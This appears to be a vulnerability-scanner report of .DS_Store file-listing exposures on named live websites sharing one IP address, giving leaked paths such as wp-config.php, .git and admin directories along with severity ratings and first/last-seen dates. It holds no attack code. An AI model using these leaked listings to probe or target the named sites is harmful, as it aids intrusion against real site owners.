Fingerprint: 5f32cf5d6962f09cecc85b04ecc85b04e86d46ed2be25d86f5667ee88f3bbac5Found 53 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn /Sunny Corn/images /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2023-05-03 18:08 -
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c861963df20051ecb80051ecb8Found 3 files trough .DS_Store spidering: /images /images/company_images /index.html
Found on 2022-10-21 18:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-23 17:36
Last seen 2024-09-16 12:38
Open for 723 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 12:38
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-23 01:07
Last seen 2024-09-16 12:35
Open for 633 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 12:35
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:48
Last seen 2024-09-16 12:17
Open for 670 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-16 12:17 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-09-10 11:12 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-09-04 13:26 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146bd709a4939e89f2aeca6749acb9c6f979Found 21 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor
Found on 2024-08-30 09:07 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-08-28 10:18 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-08-14 14:17 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-07-24 20:46 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2024-07-04 18:09
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-18 18:41
Last seen 2024-09-16 12:11
Open for 637 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aabe06c3b48ae79529658ffac091255406Found 33 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-16 12:11 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-14 06:41 -
Severity: medium
Fingerprint: 5f32cf5d6962f09ca629b8b1a629b8b143a27af3538b923450299d7b7927ec8aFound 34 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-08-04 08:29 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-06-18 10:42
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: kumarandesign.manmachinemixedmedia.com
Port: 443
URL: https://kumarandesign.manmachinemixedmedia.comFirst seen 2022-10-20 18:31
Last seen 2024-09-16 12:10
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d83fa5bcae254fbb4f2bc97ef927c132d4Found 8 files trough .DS_Store spidering: /javascript /site.psd /site_index.jpg /site_projectlist.jpg /site_selectedproject.jpg /site_work.jpg /siteimages /type
Found on 2024-09-16 12:10
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:18
Last seen 2024-09-16 12:09
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bc5e74dd734213f79136acb1d242cea00cFound 22 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/images/inventory /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-09-16 12:09 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b8f73f7167c256670f22a60a7bd5a7888Found 21 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/posters /history_company/runway_models /history_company/runway_models/images /history_company/runway_models/images/inventory /history_company/runway_models/index.html /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2024-06-04 09:43 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdc57c57adc57c57a6869890980aa170f50c3dc90a2216fcaFound 19 files trough .DS_Store spidering: /all_dropdown.css /DIN-HOME-Chartered-Contractors-LOGO.gif /dinhome_contact.css /dinhome_home.css /favicon-16x16.png /favicon-32x32.png /history_company /history_company/careers_&_development /history_company/images /history_company/images/inventory /history_company/posters /history_company/runway_models /images /index.html /job /main.css /privacy_statement_of_dinhome_design_main.css /project_management.css /SpryAssets
Found on 2022-10-20 18:18
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-25 17:36
Last seen 2024-09-16 12:07
Open for 721 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 12:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-28 17:48
Last seen 2024-09-16 12:07
Open for 718 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c99d3320899d33208e922b3c9809eb348743ca9dff4d57f56Found 44 files trough .DS_Store spidering: /_notes /about.html /archive template /blog-single.html /blog.html /contact.html /contact.php /css /Documentation /fonts /img /img/_notes /img/about_BU.jpg /img/comment-1.jpg /img/comment-2.jpg /img/comment-3.jpg /img/comment-4.jpg /img/favicon.png /img/logo-munnely-.jpg /img/logo.png /img/logo_.png /img/munnelly_logo.jpg /img/post-1.jpg /img/post-2.jpg /img/post-3.jpg /img/post-4.jpg /img/post-5.jpg /img/post-6.jpg /img/skills_BU.jpg /img/Thumbs.db /img/work-1_BU.jpg /img/work-2_BU.jpg /img/work-3_BU.jpg /img/work-4.jpg /img/work-5.jpg /img/work-6.jpg /img/work-7.jpg /img/work-8.jpg /img/work-9.jpg /index.html /js /works-single.html /works.html /writing.html
Found on 2024-09-16 12:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cuir-panda-leather.ca
Port: 443
URL: https://www.cuir-panda-leather.caFirst seen 2022-12-19 18:58
Last seen 2024-09-16 11:52
Open for 636 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2024-09-16 11:52
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:03
Last seen 2024-09-16 11:00
Open for 695 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c70ba7b5770ba7b579a2bc1b00143b801d239c02f7e971367Found 54 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-09-16 11:00 -
Severity: low
Fingerprint: 5f32cf5d6962f09c026392ab026392ab05e6c1dc3c0b2f05f38aad59dec61e8bFound 7 files trough .DS_Store spidering: /_notes /images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing
Found on 2024-08-16 05:24 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cecc85b04ecc85b04e86d46ed2be25d86f5667ee860722411Found 53 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-07-22 08:01 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af2472530e9b486533a568f95496cfded50324dFound 9 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing
Found on 2024-05-08 21:50 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c7d264b917d264b91266da2aaaa5940ebeaab77895c3cfdefFound 52 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2023-10-03 14:52 -
Severity: medium
